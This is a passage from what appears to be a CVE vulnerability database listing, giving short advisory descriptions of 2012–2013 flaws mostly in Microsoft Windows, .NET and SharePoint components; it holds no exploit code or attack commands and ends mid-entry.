Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly manage memory during deletion of printer connections, which allows remote authenticated users to execute arbitrary code via a crafted request, aka "Print Spooler Vulnerability." [CVE-2013-1337] Microsoft .NET Framework 4.5 does not properly create policy requirements for custom Windows Communication Foundation (WCF) endpoint authentication in certain situations involving passwords over HTTPS, which allows remote attackers to bypass authentication by sending queries to an endpoint, aka "Authentication Bypass Vulnerability." [CVE-2013-1334] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Window Handle Vulnerability." [CVE-2013-1333] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Buffer Overflow Vulnerability." [CVE-2013-1332] dxgkrnl.sys (aka the DirectX graphics kernel subsystem) in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "DirectX Graphics Kernel Subsystem Double Fetch Vulnerability." [CVE-2013-1313] Object Linking and Embedding (OLE) Automation in Microsoft Windows XP SP3 does not properly allocate memory, which allows remote attackers to execute arbitrary code via a crafted RTF document, aka "OLE Automation Remote Code Execution Vulnerability." [CVE-2013-1305] HTTP.sys in Microsoft Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (infinite loop) via a crafted HTTP header, aka "HTTP.sys Denial of Service Vulnerability." [CVE-2013-1300] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Allocation Vulnerability." [CVE-2013-1299] Microsoft Windows Modern Mail allows remote attackers to spoof link targets via a crafted HTML e-mail message. [CVE-2013-1295] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "CSRSS Memory Corruption Vulnerability." [CVE-2013-1294] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1293] The NTFS kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a crafted application that leverages improper handling of objects in memory, aka "NTFS NULL Pointer Dereference Vulnerability." [CVE-2013-1292] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1291] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, Windows 7 Gold and SP1, and Windows 8 allows local users to cause a denial of service (reboot) via a crafted OpenType font, aka "OpenType Font Parsing Vulnerability" or "Win32k Font Parsing Vulnerability." [CVE-2013-1287] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1286. [CVE-2013-1286] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1285 and CVE-2013-1287. [CVE-2013-1285] The USB kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, and Windows Server 2012 do not properly handle objects in memory, which allows physically proximate attackers to execute arbitrary code by connecting a crafted USB device, aka "Windows USB Descriptor Vulnerability," a different vulnerability than CVE-2013-1286 and CVE-2013-1287. [CVE-2013-1284] Race condition in the kernel in Microsoft Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Kernel Race Condition Vulnerability." [CVE-2013-1283] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Win32k Race Condition Vulnerability." [CVE-2013-1281] The NFS server in Microsoft Windows Server 2008 R2 and R2 SP1 and Server 2012 allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via an attempted renaming of a file or folder located on a read-only share, aka "NULL Dereference Vulnerability." [CVE-2013-1280] The kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Reference Count Vulnerability." [CVE-2013-1279] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1278. [CVE-2013-1278] Race condition in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges via a crafted application that leverages incorrect handling of objects in memory, aka "Kernel Race Condition Vulnerability," a different vulnerability than CVE-2013-1279. [CVE-2013-1277] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1276] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1275] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1274] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1273] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1272] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1271] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1270] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1269] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1268] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1267] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1266] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1265] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1264] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1263] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1262] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1261] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1260] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1259] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1258] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1257] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1256] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1255] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1254] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1253] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1252] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1251] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1250] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1249] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-1248] Race condition in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows local users to gain privileges, and consequently read the contents of arbitrary kernel memory locations, via a crafted application, a different vulnerability than other CVEs listed in MS13-016. [CVE-2013-0941] EMC RSA Authentication API before 8.1 SP1, RSA Web Agent before 5.3.5 for Apache Web Server, RSA Web Agent before 5.3.5 for IIS, RSA PAM Agent before 7.0, and RSA Agent before 6.1.4 for Microsoft Windows use an improper encryption algorithm and a weak key for maintaining the stored data of the node secret for the SecurID Authentication API, which allows local users to obtain sensitive information via cryptographic attacks on this data. [CVE-2013-0096] Writer in Microsoft Windows Essentials 2011 and 2012 allows remote attackers to bypass proxy settings and overwrite arbitrary files via crafted URL parameters, aka "Windows Essentials Improper URI Handling Vulnerability." [CVE-2013-0078] The Microsoft Antimalware Client in Windows Defender on Windows 8 and Windows RT uses an incorrect pathname for MsMpEng.exe, which allows local users to gain privileges via a crafted application, aka "Microsoft Antimalware Improper Pathname Vulnerability." [CVE-2013-0077] Quartz.dll in DirectShow in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP2, and Server 2008 SP2 allows remote attackers to execute arbitrary code via crafted media content in (1) a media file, (2) a media stream, or (3) a Microsoft Office document, aka "Media Decompression Vulnerability." [CVE-2013-0076] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 does not properly handle objects in memory, which allows local users to gain privileges via a crafted application, aka "Reference Count Vulnerability." [CVE-2013-0075] The TCP/IP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to cause a denial of service (reboot) via a crafted packet that terminates a TCP connection, aka "TCP FIN WAIT Vulnerability." [CVE-2013-0073] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 2.0 SP2, 3.5, 3.5.1, 4, and 4.5 does not properly restrict the privileges of a callback function during object creation, which allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application, aka "WinForms Callback Elevation Vulnerability." [CVE-2013-0013] The SSL provider component in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle encrypted packets, which allows man-in-the-middle attackers to conduct SSLv2 downgrade attacks against (1) SSLv3 sessions or (2) TLS sessions by intercepting handshakes and injecting content, aka "Microsoft SSL Version 3 and TLS Protocol Security Feature Bypass Vulnerability." [CVE-2013-0011] The Print Spooler in Microsoft Windows Server 2008 R2 and R2 SP1 and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted print job, aka "Windows Print Spooler Components Vulnerability." [CVE-2013-0008] win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability." [CVE-2013-0005] The WCF Replace function in the Open Data (aka OData) protocol implementation in Microsoft .NET Framework 3.5, 3.5 SP1, 3.5.1, and 4, and the Management OData IIS Extension on Windows Server 2012, allows remote attackers to cause a denial of service (resource consumption and daemon restart) via crafted values in HTTP requests, aka "Replace Denial of Service Vulnerability." [CVE-2013-0002] Buffer overflow in the Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 3.5, 3.5.1, 4, and 4.5 allows remote attackers to execute arbitrary code via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages improper counting of objects during a memory copy operation, aka "WinForms Buffer Overflow Vulnerability." [CVE-2013-0001] The Windows Forms (aka WinForms) component in Microsoft .NET Framework 1.0 SP3, 1.1 SP1, 2.0 SP2, 3.0 SP2, 4, and 4.5 does not properly initialize memory arrays, which allows remote attackers to obtain sensitive information via (1) a crafted XAML browser application (XBAP) or (2) a crafted .NET Framework application that leverages a pointer to an unmanaged memory location, aka "System Drawing Information Disclosure Vulnerability." [CVE-2012-4786] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allow remote attackers to execute arbitrary code via a crafted TrueType Font (TTF) file, aka "TrueType Font Parsing Vulnerability." [CVE-2012-4774] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via a crafted (1) file name or (2) subfolder name that triggers use of unallocated memory as the destination of a copy operation, aka "Windows Filename Parsing Vulnerability." [CVE-2012-2993] Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate. [CVE-2012-2897] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT, as used by Google Chrome before 22.0.1229.79 and other programs, do not properly handle objects in memory, which allows remote attackers to execute arbitrary code via a crafted TrueType font file, aka "Windows Font Parsing Vulnerability" or "TrueType Font Parsing Vulnerability." [CVE-2012-2556] The OpenType Font (OTF) driver in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT allows remote attackers to execute arbitrary code via a crafted OpenType font file, aka "OpenType Font Parsing Vulnerability." [CVE-2012-2553] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2551] The server in Kerberos in Microsoft Windows Server 2008 R2 and R2 SP1, and Windows 7 Gold and SP1, allows remote attackers to cause a denial of service (NULL pointer dereference and reboot) via a crafted session request, aka "Kerberos NULL Dereference Vulnerability." [CVE-2012-2530] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2529] Integer overflow in the kernel in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages improper handling of objects in memory, aka "Windows Kernel Integer Overflow Vulnerability." [CVE-2012-2527] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application, aka "Win32k Use After Free Vulnerability." [CVE-2012-2526] The Remote Desktop Protocol (RDP) implementation in Microsoft Windows XP SP3 does not properly process packets in memory, which allows remote attackers to execute arbitrary code by sending crafted RDP packets triggering access to a deleted object, aka "Remote Desktop Protocol Vulnerability." [CVE-2012-2520] Cross-site scripting (XSS) vulnerability in Microsoft InfoPath 2007 SP2 and SP3 and 2010 SP1, Communicator 2007 R2, Lync 2010 and 2010 Attendee, SharePoint Server 2007 SP2 and SP3 and 2010 SP1, Groove Server 2010 SP1, Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010 SP1, and Office Web Apps 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via a crafted string, aka "HTML Sanitization Vulnerability." [CVE-2012-1945] Mozilla Firefox 4.x through 12.0, Firefox ESR 10.x before 10.0.5, Thunderbird 5.0 through 12.0, Thunderbird ESR 10.x before 10.0.5, and SeaMonkey before 2.10 allow local users to obtain sensitive information via an HTML document that loads a shortcut (aka .lnk) file for display within an IFRAME element, as demonstrated by a network share implemented by (1) Microsoft Windows or (2) Samba. [CVE-2012-1893] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate callback parameters during creation of a hook procedure, which allows local users to gain privileges via a crafted application, aka "Win32k Incorrect Type Handling Vulnerability." [CVE-2012-1891] Heap-based buffer overflow in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2 and Windows Data Access Components (WDAC) 6.0 allows remote attackers to execute arbitrary code via crafted XML data that triggers access to an uninitialized object in memory, aka "ADO Cachesize Heap Overflow RCE Vulnerability." [CVE-2012-1890] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle keyboard-layout files, which allows local users to gain privileges via a crafted application, aka "Keyboard Layout Vulnerability." [CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability." [CVE-2012-1868] Race condition in the thread-creation implementation in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application, aka "Win32k.sys Race Condition Vulnerability." [CVE-2012-1867] Integer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted TrueType font file that triggers incorrect memory allocation, aka "Font Resource Refcount Integer Overflow Vulnerability." [CVE-2012-1866] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "Clipboard Format Atom Name Handling Vulnerability." [CVE-2012-1865] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1864. [CVE-2012-1864] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle user-mode input passed to kernel mode for driver objects, which allows local users to gain privileges via a crafted application, aka "String Atom Class Name Handling Vulnerability," a different vulnerability than CVE-2012-1865. [CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability." [CVE-2012-1853] Stack-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Stack Overflow Vulnerability." [CVE-2012-1852] Heap-based buffer overflow in the Remote Administration Protocol (RAP) implementation in the LanmanWorkstation service in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted RAP response packets, aka "Remote Administration Protocol Heap Overflow Vulnerability." [CVE-2012-1851] Format string vulnerability in the Print Spooler service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista 